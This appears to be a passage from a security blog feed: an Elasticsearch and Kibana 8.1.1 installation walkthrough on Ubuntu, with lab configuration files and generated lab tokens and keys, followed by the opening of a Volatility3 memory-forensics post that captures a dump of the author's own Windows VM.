<span style="color: white;">Setting up apt-transport-https (2.0.6) ..</span>
</pre></div>
</div><div><br /></div><div><div>Save the Elastic repo information</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ echo "deb [signed-by=/usr/share/keyrings/elasticsearch-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main" | sudo tee /etc/apt/sources.list.d/elastic-8.x.list</span>
<span style="color: white;">deb [signed-by=/usr/share/keyrings/elasticsearch-keyring.gpg] https://artifacts.elastic.co/packages/8.x/apt stable main</span>
</pre></div>
</div><div><br /></div><div><div>Install Elasticsearch 8.1</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo apt-get update && sudo apt-get install elasticsearch</span>
<span style="color: white;">------------</span>
<span style="color: white;">The following NEW packages will be installed:</span>
<span style="color: white;"> elasticsearch</span>
<span style="color: white;">...</span>
<span style="color: white;">Preparing to unpack .../elasticsearch_8.1.1_amd64.deb ...</span>
<span style="color: white;">Creating elasticsearch group... OK</span>
<span style="color: white;">Creating elasticsearch user... OK</span>
<span style="color: white;">Unpacking elasticsearch (8.1.1) ...</span>
<span style="color: white;">Setting up elasticsearch (8.1.1) ...</span>
<span style="color: white;">--------------------------- Security autoconfiguration information ------------------------------</span>
<span style="color: white;">Authentication and authorization are enabled.</span>
<span style="color: white;">TLS for the transport and HTTP layers is enabled and configured.</span>
<span style="color: white;">The generated password for the elastic built-in superuser is : Laqr4gkhwa-Do=Ctia15</span>
<span style="color: white;">If this node should join an existing cluster, you can reconfigure this with</span>
<span style="color: white;">'/usr/share/elasticsearch/bin/elasticsearch-reconfigure-node --enrollment-token <token-here>'</span>
<span style="color: white;">after creating an enrollment token on your existing cluster.</span>
<span style="color: white;">You can complete the following actions at any time:</span>
<span style="color: white;">Reset the password of the elastic built-in superuser with</span>
<span style="color: white;">'/usr/share/elasticsearch/bin/elasticsearch-reset-password -u elastic'.</span>
<span style="color: white;">Generate an enrollment token for Kibana instances with</span>
<span style="color: white;"> '/usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s kibana'.</span>
<span style="color: white;">Generate an enrollment token for Elasticsearch nodes with</span>
<span style="color: white;">'/usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token -s node'.</span>
<span style="color: white;">-------------------------------------------------------------------------------------------------</span>
<span style="color: white;">### NOT starting on installation, please execute the following statements to configure elasticsearch service to start automatically using systemd</span>
<span style="color: white;"> sudo systemctl daemon-reload</span>
<span style="color: white;"> sudo systemctl enable elasticsearch.service</span>
<span style="color: white;">### You can start elasticsearch service by executing</span>
<span style="color: white;"> sudo systemctl start elasticsearch.service</span>
<span style="color: white;">-----------</span>
</pre></div>
</div><div><br /></div><div>Make configuration change to customize this deployment for our environment. First make a backup copy of the configuration file.</div><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo cp /etc/elasticsearch/elasticsearch.yml /etc/elasticsearch/elasticsearch.yml.ORIGINAL</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Here are the changes to my <i>elasticsearch.yml. </i></p><div><i><!--HTML generated using hilite.me--></i><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo grep --invert-match "^#" /etc/elasticsearch/elasticsearch.yml</span>
<span style="color: white;">cluster.name: n3-elastic</span>
<span style="color: white;">node.name: securitynik.n3.local</span>
<span style="color: white;">node.attr.rack: ServerCloset</span>
<span style="color: white;">path.data: /var/lib/elasticsearch</span>
<span style="color: white;">path.logs: /var/log/elasticsearch</span>
<span style="color: white;">network.host: securitynik.local</span>
<span style="color: white;">http.port: 9200</span>
<span style="color: white;">xpack.security.enabled: true</span>
<span style="color: white;">xpack.security.enrollment.enabled: true</span>
<span style="color: white;">xpack.security.http.ssl:</span>
<span style="color: white;"> enabled: true</span>
<span style="color: white;"> keystore.path: certs/http.p12</span>
<span style="color: white;">xpack.security.transport.ssl:</span>
<span style="color: white;"> enabled: true</span>
<span style="color: white;"> verification_mode: certificate</span>
<span style="color: white;"> keystore.path: certs/transport.p12</span>
<span style="color: white;"> truststore.path: certs/transport.p12</span>
<span style="color: white;">cluster.initial_master_nodes: ["securitynik"]</span>
<span style="color: white;">http.host: [_local_, _site_]</span>
</pre></div>
</div><div><br /></div><div><div>Adjusting the Java Virtual Machine (JVM) Heap Size by first creating a file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo cat /etc/elasticsearch/jvm.options.d/jvm.options</span>
<span style="color: white;">-Xms16g</span>
<span style="color: white;">-Xmx16g</span>
</pre></div>
</div><div><br /></div><div><div>Add new host information to my host file, just in case DNS is not working.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo bash -c "echo 10.0.0.4 peeping-tom peeping-tom.n3.local >> /etc/hosts"<br /></span><span style="color: white;">securitynik@securitynik:~$ grep peeping-tom /etc/hosts<br /></span><span style="color: white;">127.0.1.1 securitynik</span>
<span style="color: white;">10.0.0.4 securitynik securitynik.local</span>
</pre></div>
</div><div><br /></div><div>Make a copy of the CA and HTTP certs to <i>/etc/ssl/certs</i>, so that it is in a location easily readable by the rest of the applications.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo cp /etc/elasticsearch/certs/http_ca.crt /etc/ssl/certs -v</span>
</pre></div><div><br /></div><div>Reload <i>systemd</i> daemon, enable and verify Elasticsearch service</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo /bin/systemctl enable elasticsearch.service</span>
<span style="color: white;">Created symlink /etc/systemd/system/multi-user.target.wants/elasticsearch.service → /lib/systemd/system/elasticsearch.service.</span>
<span style="color: white;">securitynik@securitynik:~$ sudo systemctl start elasticsearch.service</span>
<span style="color: white;">securitynik@securitynik:~$ systemctl status elasticsearch.service</span>
<span style="color: white;">● elasticsearch.service - Elasticsearch</span>
<span style="color: white;"> Loaded: loaded (/lib/systemd/system/elasticsearch.service; enabled; vendor preset: enabled)</span>
<span style="color: white;"> Active: active (running) since Wed 2022-03-30 19:53:03 EDT; 18s ago</span>
<span style="color: white;"> Docs: https://www.elastic.co</span>
<span style="color: white;"> Main PID: 76746 (java)</span>
<span style="color: white;"> Tasks: 80 (limit: 38298)</span>
<span style="color: white;"> Memory: 16.9G</span>
<span style="color: white;"> CGroup: /system.slice/elasticsearch.service</span>
<span style="color: white;"> ├─76746 /usr/share/elasticsearch/jdk/bin/java -Xshare:auto -Des.networkaddress.cache.ttl=60 -Des.networkaddress.cac></span>
<span style="color: white;"> └─77051 /usr/share/elasticsearch/modules/x-pack-ml/platform/linux-x86_64/bin/controller</span>
<span style="color: white;">Mar 30 19:52:47 securitynik systemd[1]: Starting Elasticsearch...</span>
<span style="color: white;">Mar 30 19:53:03 securitynik systemd[1]: Started Elasticsearch.</span>
<span style="color: white;">lines 1-13/13 (END)</span>
</pre></div>
</div><div><br /></div><div><div>Confirming the Elasticsearch ports are listening for incoming communication.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo ss --numeric --listening --tcp --processes | grep --perl-regexp "9300|9200"</span>
<span style="color: white;">LISTEN 0 4096 [::ffff:10.0.0.4]:9200 *:* users:(("java",pid=76746,fd=386))</span>
<span style="color: white;">LISTEN 0 4096 [::ffff:127.0.0.1]:9200 *:* users:(("java",pid=76746,fd=385))</span>
<span style="color: white;">LISTEN 0 4096 [::1]:9200 [::]:* users:(("java",pid=76746,fd=384))</span>
<span style="color: white;">LISTEN 0 4096 [::ffff:10.0.0.4]:9300 *:* users:(("java",pid=76746,fd=382))</span>
</pre></div>
</div><div><br /></div><div><div>Connecting to the Elasticsearch service via https</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo curl https://10.0.0.4:9200 --cacert /etc/elasticsearch/certs/http_ca.crt -u elastic</span>
<span style="color: white;">Enter host password for user 'elastic':</span>
<span style="color: white;">{</span>
<span style="color: white;"> "name" : "securitynik.n3.local",</span>
<span style="color: white;"> "cluster_name" : "n3-elastic",</span>
<span style="color: white;"> "cluster_uuid" : "KDh-JRfXQtuXjXo2hniQjg",</span>
<span style="color: white;"> "version" : {</span>
<span style="color: white;"> "number" : "8.1.1",</span>
<span style="color: white;"> "build_flavor" : "default",</span>
<span style="color: white;"> "build_type" : "deb",</span>
<span style="color: white;"> "build_hash" : "d0925dd6f22e07b935750420a3155db6e5c58381",</span>
<span style="color: white;"> "build_date" : "2022-03-17T22:01:32.658689558Z",</span>
<span style="color: white;"> "build_snapshot" : false,</span>
<span style="color: white;"> "lucene_version" : "9.0.0",</span>
<span style="color: white;"> "minimum_wire_compatibility_version" : "7.17.0",</span>
<span style="color: white;"> "minimum_index_compatibility_version" : "7.0.0"</span>
<span style="color: white;"> },</span>
<span style="color: white;"> "tagline" : "You Know, for Search"</span>
<span style="color: white;">}</span>
</pre></div>
</div><div><br /></div><div><div>Good stuff! We have validated Elasticsearch is working as expected.</div></div><div><br /></div><div><h2 style="text-align: left;"><b>Installing Kibana on </b></h2></div><div>Considering all the heavy lifting was done above, time to install Kibana.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo apt-get update && sudo apt-get install kibana</span>
<span style="color: white;">...</span>
<span style="color: white;">Preparing to unpack .../kibana_8.1.1_amd64.deb ...</span>
<span style="color: white;">Unpacking kibana (8.1.1) ...</span>
<span style="color: white;">Setting up kibana (8.1.1) ...</span>
<span style="color: white;">Creating kibana group... OK</span>
<span style="color: white;">Creating kibana user... OK</span>
<span style="color: white;">Created Kibana keystore in /etc/kibana/kibana.keystore</span>
</pre></div>
</div><div><br /></div><div>Make a copy of the Kibana configuration file.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo cp /etc/kibana/kibana.yml /etc/kibana.yml.ORIGINAL</span>
</pre></div>
</div><div><br /></div><div><div>Generate a token</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo /usr/share/elasticsearch/bin/elasticsearch-create-enrollment-token --scope kibana</span>
<span style="color: white;">eyM4XXIiOiI4LjEuMSIsImFkciI6WyIxOTIuMTY4LjAuNDo5MjAwIl0sImZnciI6ImUyMjRhMTkyMzkwMzE1MzM2MjM5MjFmMDMyYjZhOTVlMDcwZDY3Mzk2NGE0M2ZmOWQ5OWU5OTc3ZmI4NTI2YmYiLCJrZXkiOiI0c25pM1g4QmtmdzFwTU9VUDEyqapaOTg9DTJtSFNtLTFMSjVzX3g0ckZ3In0=</span>
</pre></div>
</div><div><br /></div><div><div>Generate encryption keys for SavedObjects, Reports, Dashboards, etc.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo /usr/share/kibana/bin/kibana-encryption-keys generate</span>
<span style="color: white;">## Kibana Encryption Key Generation Utility</span>
<span style="color: white;">The 'generate' command guides you through the process of setting encryption keys for:</span>
<span style="color: white;">xpack.encryptedSavedObjects.encryptionKey</span>
<span style="color: white;"> Used to encrypt stored objects such as dashboards and visualizations</span>
<span style="color: white;"> https://www.elastic.co/guide/en/kibana/current/xpack-security-secure-saved-objects.html#xpack-security-secure-saved-objects</span>
<span style="color: white;">xpack.reporting.encryptionKey</span>
<span style="color: white;"> Used to encrypt saved reports</span>
<span style="color: white;"> https://www.elastic.co/guide/en/kibana/current/reporting-settings-kb.html#general-reporting-settings</span>
<span style="color: white;">xpack.security.encryptionKey</span>
<span style="color: white;"> Used to encrypt session information</span>
<span style="color: white;"> https://www.elastic.co/guide/en/kibana/current/security-settings-kb.html#security-session-and-cookie-settings</span>
<span style="color: white;">Already defined settings are ignored and can be regenerated using the --force flag. Check the documentation links for instructions on how to rotate encryption keys.</span>
<span style="color: white;">Definitions should be set in the kibana.yml used configure Kibana.</span>
<span style="color: white;">Settings:</span>
<span style="color: white;">xpack.encryptedSavedObjects.encryptionKey: f4667a5634faf22053dbd40d91afa8b5</span>
<span style="color: white;">xpack.reporting.encryptionKey: f03f17de223aced044cd3afb42de3137</span>
<span style="color: white;">xpack.security.encryptionKey: f17be84bbaa17dc9cb8a06cb95e0d5be</span>
</pre></div>
<div><br /></div><div><div>Add the last 3 lines from above, to the <i>kibana.yml</i> file and start the Kibana service.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo /bin/systemctl daemon-reload</span>
<span style="color: white;">securitynik@securitynik:~$ sudo /bin/systemctl enable kibana.service</span>
<span style="color: white;">securitynik@securitynik:~$ sudo systemctl start kibana.service</span>
<span style="color: white;">-------------</span>
<span style="color: white;">securitynik@securitynik:~$ sudo systemctl status kibana.service</span>
<span style="color: white;">● kibana.service - Kibana</span>
<span style="color: white;"> Loaded: loaded (/lib/systemd/system/kibana.service; enabled; vendor preset: enabled)</span>
<span style="color: white;"> Active: active (running) since Wed 2022-03-30 22:56:14 EDT; 8s ago</span>
<span style="color: white;"> Docs: https://www.elastic.co</span>
<span style="color: white;"> Main PID: 102001 (node)</span>
<span style="color: white;"> Tasks: 11 (limit: 38298)</span>
<span style="color: white;"> Memory: 231.7M</span>
<span style="color: white;"> CGroup: /system.slice/kibana.service</span>
<span style="color: white;"> └─102001 /usr/share/kibana/bin/../node/bin/node /usr/share/kibana/bin/../src/cli/dist</span>
<span style="color: white;">Mar 30 22:56:14 securitynik systemd[1]: Started Kibana.</span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.275-04:00][INFO ][plugins-service] Plugin "metricsEntities" is disabled.</span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.345-04:00][INFO ][http.server.Preboot] http server running at http://192></span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.372-04:00][INFO ][plugins-system.preboot] Setting up [1] plugins: [inter></span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.374-04:00][INFO ][preboot] "interactiveSetup" plugin is holding setup: V></span>
<span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: [2022-03-30T22:56:21.399-04:00][INFO ][root] Holding setup until preboot stage is completed.</span>
<span><span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: </span><b><span style="color: #fcff01;">i Kibana has not been configured.</span></b></span>
<span><span style="color: white;">Mar 30 22:56:21 securitynik kibana[102001]: </span><b><span style="color: #fcff01;">Go to http://10.0.0.4:5601/?code=452840 to get started.</span></b></span>
</pre></div>
</div><br />Open the URL identified above in a browser and add the previously created token for Kibana.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTwxFIjeepR3za2TNo4Da-w2-2kwdvBqZ-ISERIhu8kWn2YLhD-RZPG10LM9pUyehTDajAuka0HegoFUaEWqmPGu6TgOznrVr7wcKBjpbf7ekDlYRgmSWECdXWjIEBspDwcYXIgBe-Uj0ByqyRABQ5YjQSXyLCViQ6Mfh5X_SOv8cVBWmpyUhaRzI/s1393/Snapshot-%20for%20kibana%20token.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="1393" data-original-width="1262" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMTwxFIjeepR3za2TNo4Da-w2-2kwdvBqZ-ISERIhu8kWn2YLhD-RZPG10LM9pUyehTDajAuka0HegoFUaEWqmPGu6TgOznrVr7wcKBjpbf7ekDlYRgmSWECdXWjIEBspDwcYXIgBe-Uj0ByqyRABQ5YjQSXyLCViQ6Mfh5X_SOv8cVBWmpyUhaRzI/w363-h400/Snapshot-%20for%20kibana%20token.png" width="363" /></a></div><div><br /></div><div>Once the token is added, we should see below.</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh71iU2MzZZqmkisJolusZsjtxbDVF0OpLzRicqGLcktKT8LXBBzNQouZGd4l5erQbasj1J7EoPafjEBnj4SYf5-7Fn1MLVPAzQbZc8kL-NOJkE-OaA-fUkws6e31RZ3bL3RcSAPy-V8giLKB1FJUm8umuax9ayNmnz1e5wqvKcKtm37d68onXWAQaf/s1593/Snapshot-%20for%20kibana%20token%20-%20setup%20complete.png" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="1593" data-original-width="1377" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh71iU2MzZZqmkisJolusZsjtxbDVF0OpLzRicqGLcktKT8LXBBzNQouZGd4l5erQbasj1J7EoPafjEBnj4SYf5-7Fn1MLVPAzQbZc8kL-NOJkE-OaA-fUkws6e31RZ3bL3RcSAPy-V8giLKB1FJUm8umuax9ayNmnz1e5wqvKcKtm37d68onXWAQaf/w346-h400/Snapshot-%20for%20kibana%20token%20-%20setup%20complete.png" width="346" /></a></div><div><br /></div><div>With the above completing successfully. Time to login to the UI, using the initially created user.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXYWBCSWgPB8SXGt-74DNpOXRF4ICiuAgnzRxOcjVjjG10O2IA-uxsLGPLMTFX5GXZiPRbK0WrD0wVv8o882TdNQLVFOqHysoJjilHMV6mN5b_t32dcdk6QPNb_4FRKJc7Lo6j8snfhIcdDrK-Ef5iYEs7kL0Qv5Pd1e6QSTWNedRvAsSapmffPMu5/s1248/ELASTIC%20authentication.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="1248" data-original-width="1107" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXYWBCSWgPB8SXGt-74DNpOXRF4ICiuAgnzRxOcjVjjG10O2IA-uxsLGPLMTFX5GXZiPRbK0WrD0wVv8o882TdNQLVFOqHysoJjilHMV6mN5b_t32dcdk6QPNb_4FRKJc7Lo6j8snfhIcdDrK-Ef5iYEs7kL0Qv5Pd1e6QSTWNedRvAsSapmffPMu5/w355-h400/ELASTIC%20authentication.png" width="355" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div>After all the changes, here is what my <i>kibana.yml</i> looks like<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">securitynik@securitynik:~$ sudo grep --perl-regexp --invert-match "^#" /etc/kibana/kibana.yml</span>
<span style="color: white;">server.host: "10.0.0.4"</span>
<span style="color: white;">server.publicBaseUrl: "http://10.0.0.4:5601"</span>
<span style="color: white;">server.name: "kibana.n3.local"</span>
<span style="color: white;">logging:</span>
<span style="color: white;"> appenders:</span>
<span style="color: white;"> file:</span>
<span style="color: white;"> type: file</span>
<span style="color: white;"> fileName: /var/log/kibana/kibana.log</span>
<span style="color: white;"> layout:</span>
<span style="color: white;"> type: json</span>
<span style="color: white;"> root:</span>
<span style="color: white;"> appenders:</span>
<span style="color: white;"> - default</span>
<span style="color: white;"> - file</span>
<span style="color: white;">pid.file: /run/kibana/kibana.pid</span>
<span style="color: white;">xpack.encryptedSavedObjects.encryptionKey: d2667a5634faf33053dbd40d91afa8c9</span>
<span style="color: white;">xpack.reporting.encryptionKey: f03f17de223aced044cd3afb42de4398</span>
<span style="color: white;">xpack.security.encryptionKey: f17be84bbaa17dc9cb8a06cb95e0f437</span>
<span style="color: white;">elasticsearch.hosts: ['https://10.0.0.4:9200']</span>
<span style="color: white;">elasticsearch.serviceAccountToken: BBEAAWVsYXN0aWMva2liYW5hL3Vucm9sbC1wcm9jZXNzLM2va2VuLTE2NDg2OTU1ODcwMDg6OVlHSWhfaFlRQXVzMFhVcWZqSTdNZw</span>
<span style="color: white;">elasticsearch.ssl.certificateAuthorities: [/var/lib/kibana/ca_1648695587748.crt]</span>
<span style="color: white;">xpack.fleet.outputs: [{id: fleet-default-output, name: default, is_default: true, is_default_monitoring: true, type: elasticsearch, hosts: ['https://10.0.0.4:9200'], ca_trusted_fingerprint: e224a19239031533623921f032b6a06e070d673964a43ff9d99e9977fb8526bd}]</span>
</pre></div>
</div><div><br /></div><div><br /></div><div><div>References:</div><div><a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/deb.html">https://www.elastic.co/guide/en/elasticsearch/reference/current/deb.html</a></div><div><a href="https://www.linkedin.com/pulse/elasticsearch-8-express-installation-guide-pascal-thalmann/">https://www.linkedin.com/pulse/elasticsearch-8-express-installation-guide-pascal-thalmann/</a></div><div><a href="https://kifarunix.com/install-elk-stack-8-x-on-ubuntu/">https://kifarunix.com/install-elk-stack-8-x-on-ubuntu/</a></div><div><a href="https://www.elastic.co/guide/en/kibana/current/deb.html">https://www.elastic.co/guide/en/kibana/current/deb.html</a></div></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-5021614761646925082022-03-18T20:35:00.002-07:002022-03-18T20:35:55.233-07:00Beginning Volatility3 Memory Forensics<p>In this post, I'm taking a quick look at Volatility3, to understand its capabilities.</p><p>First up, obtaining Volatility3 via GitHub.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~]</span>
<span style="color: white;">└─$ git clone https://github.com/volatilityfoundation/volatility3.git</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Next up, get an image. For this, I will take a memory dump of my own virtual machine, using Comae's Toolkit DumpIt.exe</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">C:\TMP</span>
<span><span style="color: white;">λ y:\Comae-Toolkit-Light-3.0.20180307.1\x64\</span><b><span style="color: #fcff01;">DumpIt.exe</span></b></span>
<span style="color: white;"> DumpIt 3.0.20180307.1</span>
<span style="color: white;"> Copyright (C) 2007 - 2017, Matthieu Suiche <http://www.msuiche.net></span>
<span style="color: white;"> Copyright (C) 2012 - 2014, MoonSols Limited <http://www.moonsols.com></span>
<span style="color: white;"> Copyright (C) 2015 - 2017, Comae Technologies FZE <http://www.comae.io></span>
<span style="color: white;"> Destination path: \</span><span style="color: #fcff01;">??\<b>C:\TMP\SECURITYNIK-WIN-20220225-182235.dmp</b></span>
<span style="color: white;"> Computer name: SECURITYNIK-WIN</span>
<span style="color: white;"> <b>--> Proceed with the acquisition ? [y/n] y</b></span>
<span style="color: white;"> [+] Information:</span>
<span style="color: white;"> Dump Type: Microsoft Crash Dump</span>
<span style="color: white;"> [+] Machine Information:</span>
<span style="color: white;"> Windows version: 10.0.19044</span>
<span style="color: white;"> MachineId: 88688394-D237-438C-92E3-06D84FF93CE9</span>
<span style="color: white;"> TimeStamp: 132902869567075443</span>
<span style="color: white;"> Cr3: 0x1aa000</span>
<span style="color: white;"> KdCopyDataBlock: 0xfffff8054df0e2e8</span>
<span style="color: white;"> KdDebuggerData: 0xfffff8054e603b20</span>
<span style="color: white;"> KdpDataBlockEncoded: 0xfffff8054e653b28</span>
<span style="color: white;"> Current date/time: [2022-02-25 (YYYY-MM-DD) 18:22:36 (UTC)]</span>
<span style="color: white;"> + Processing... Done.</span>
<span style="color: white;"> Acquisition finished at: [2022-02-25 (YYYY-MM-DD) 18:22:50 (UTC)]</span>
<span style="color: white;"> Time elapsed: 0:14 minutes:seconds (14 secs)</span>
<span style="color: white;"> Created file size: 2147020800 bytes (2047 Mb)</span>
<span style="color: white;"> Total physical memory size: 2047 Mb</span>
<span style="color: white;"> NtStatus (troubleshooting): 0x00000000</span>
<span style="color: white;"> Total of written pages: 524173</span>
<span style="color: white;"> Total of inacessible pages: 0</span>
<span style="color: white;"> Total of accessible pages: 524173</span>
<span style="color: white;"> SHA-256: A943219879526515F889BA2707699391132EC648E9C3B1B34C45A50DAB0BA6A3</span>
<span style="color: white;"> JSON path: C:\TMP\SECURITYNIK-WIN-20220225-182235.json</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Now that I have the memory image, first step is to get some help on how to usethe tool.</p><p>Setup a symbolic link for volatility3</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span style="color: white;">└─$ </span><span style="color: #fcff01;"><b>sudo ln --symbolic ~/volatility3/vol.py /usr/bin/vol3</b></span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Getting some help!</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(securitynik㉿securitynik)-[~/mem_samples]</span>
<span><span style="color: white;">└─$ </span><b><span style="color: #fcff01;">vol3 --help | more</span></b><span style="color: white;"> </span></span>
<span style="color: white;">Volatility 3 Framework 2.0.2</span>
<span style="color: white;">usage: volatility [-h] [-c CONFIG] [--parallelism [{processes,threads,off}]]</span>
